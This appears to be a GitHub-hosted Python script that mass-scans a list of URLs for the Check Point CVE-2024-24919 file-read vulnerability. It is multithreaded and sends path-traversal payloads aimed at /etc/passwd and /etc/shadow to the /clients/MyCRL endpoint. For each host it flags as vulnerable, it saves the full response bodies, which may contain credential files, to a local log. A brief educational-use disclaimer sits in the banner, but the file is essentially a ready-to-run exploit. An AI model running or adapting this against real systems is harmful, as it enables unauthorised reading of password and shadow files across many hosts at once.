-
Notifications
You must be signed in to change notification settings - Fork 5
/
CVE-2024-24919-auto-v2.py
203 lines (173 loc) · 6.46 KB
/
CVE-2024-24919-auto-v2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
import requests
import re
from termcolor import colored
import urllib3
import sys
import argparse
import urllib.parse
from threading import Thread, Lock
from queue import Queue
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Global counters and results
success_count = 0
fail_count = 0
timeout_count = 0
total_urls = 0
vulnerable_urls = []
lock = Lock()
def display_header():
header = """
____
____ _____ ___ _/_ | ____
/ \\\\__ \\\\ \\/ /| |/ \\
| | \\/ __ \\\\ / | | | \\
|___| (____ /\\_/ |___|___| /
\\/ \\/ \\/
"""
info = """
[CVE-2024-24919] Bulk Scanner
Intended only for educational and testing in corporate environments.
https://twitter.com/nav1n0x/ https://github.com/ifconfig-me takes no responsibility for the code, use at your own risk.
Do not attack a target you don't have permission to engage with.
"""
print(colored(header, 'cyan'))
print(colored(info, 'yellow'))
def check_vulnerability(response):
expected_headers = {
'Server': 'Check Point SVN foundation',
'X-UA-Compatible': 'IE=EmulateIE7',
'X-Frame-Options': 'SAMEORIGIN'
}
match_count = sum(1 for k, v in expected_headers.items() if response.headers.get(k) == v)
status_line_match = response.status_code == 200 and response.raw.version == 10 # HTTP/1.0
return match_count >= 3 and status_line_match
def log_request(f, url, method, headers, data, response, is_exception=False):
f.write(f"{method} /clients/MyCRL HTTP/1.1\n")
for key, value in headers.items():
f.write(f"{key}: {value}\n")
if data:
f.write(f"\n{data}\n")
if is_exception:
f.write(f"\nResponse: {response}\n")
else:
f.write(f"\nResponse Headers:\n")
for key, value in response.headers.items():
f.write(f"{key}: {value}\n")
f.write(f"\nResponse Body:\n{response.text}\n")
f.write("="*80 + "\n")
def get_hostname(url):
parsed_url = urllib.parse.urlparse(url)
return parsed_url.netloc or parsed_url.path
def is_valid_url(url):
try:
parsed_url = urllib.parse.urlparse(url)
return all([parsed_url.scheme, parsed_url.netloc])
except Exception:
return False
def post_request(url):
global success_count, fail_count, timeout_count, vulnerable_urls
if not is_valid_url(url):
with lock:
fail_count += 1
return
hostname = get_hostname(url)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "close",
"Host": hostname,
"Content-Length": "39"
}
timeout = 3
payloads = [
"aCSHELL/../../../../../../../etc/passwd",
"aCSHELL/../../../../../../../etc/shadow"
]
is_vulnerable = False
# This is for analyzing purpose only - feel free to remove this.
for data in payloads:
try:
post_response = requests.post(url + "/clients/MyCRL", headers=headers, data=data, timeout=timeout, verify=False)
if check_vulnerability(post_response):
is_vulnerable = True
with lock:
success_count += 1
break
else:
with lock:
fail_count += 1
except requests.exceptions.Timeout:
with lock:
timeout_count += 1
except (requests.exceptions.RequestException, UnicodeError):
with lock:
fail_count += 1
if is_vulnerable:
with lock:
vulnerable_urls.append(url)
print(f"{colored(' Vulnerable URL found:', 'green')} {url}")
with open("request-analyze-v2.txt", "a") as f:
for data in payloads:
try:
post_response = requests.post(url + "/clients/MyCRL", headers=headers, data=data, timeout=timeout, verify=False)
log_request(f, url, "POST", headers, data, post_response)
except requests.exceptions.RequestException:
pass
def worker(queue):
while True:
url = queue.get()
if url is None:
break
post_request(url)
queue.task_done()
update_progress()
def process_urls_from_file(file_path, num_threads):
global total_urls
with open(file_path, 'r') as file:
urls = file.readlines()
total_urls = len(urls)
queue = Queue()
for url in urls:
url = url.strip()
if not url.startswith("http://") and not url.startswith("https://"):
url = "https://" + url
queue.put(url)
threads = []
for _ in range(num_threads):
thread = Thread(target=worker, args=(queue,))
thread.start()
threads.append(thread)
queue.join()
for _ in range(num_threads):
queue.put(None)
for thread in threads:
thread.join()
# Save vulnerable URLs to a file
with open("checkpoint-results-v2.txt", "w") as result_file:
for url in vulnerable_urls:
result_file.write(url + "\n")
def update_progress():
with lock:
scanned = success_count + fail_count + timeout_count
remaining = total_urls - scanned
progress_message = (f"{colored('Scanning:', 'yellow')} {scanned}/{total_urls} "
f"{colored('Remaining:', 'cyan')} {remaining} "
f"{colored('Success:', 'green')} {success_count}, "
f"{colored('Fail:', 'red')} {fail_count}, "
f"{colored('Timeout:', 'blue')} {timeout_count}")
sys.stdout.write('\r' + progress_message)
sys.stdout.flush()
def main():
display_header()
parser = argparse.ArgumentParser(description="Scan URLs for vulnerabilities.")
parser.add_argument('-f', '--file', type=str, required=True, help="Path to the file containing URLs")
parser.add_argument('-t', '--threads', type=int, default=10, help="Number of concurrent threads")
args = parser.parse_args()
process_urls_from_file(args.file, args.threads)
# This part prrints the vulnerable URLs at the end of the run. Feel free to hide, if you have a bulk list as this makes your teminal unresponsive.
print("\n\nVulnerable URLs:")
for url in vulnerable_urls:
print(url)
if __name__ == "__main__":
main()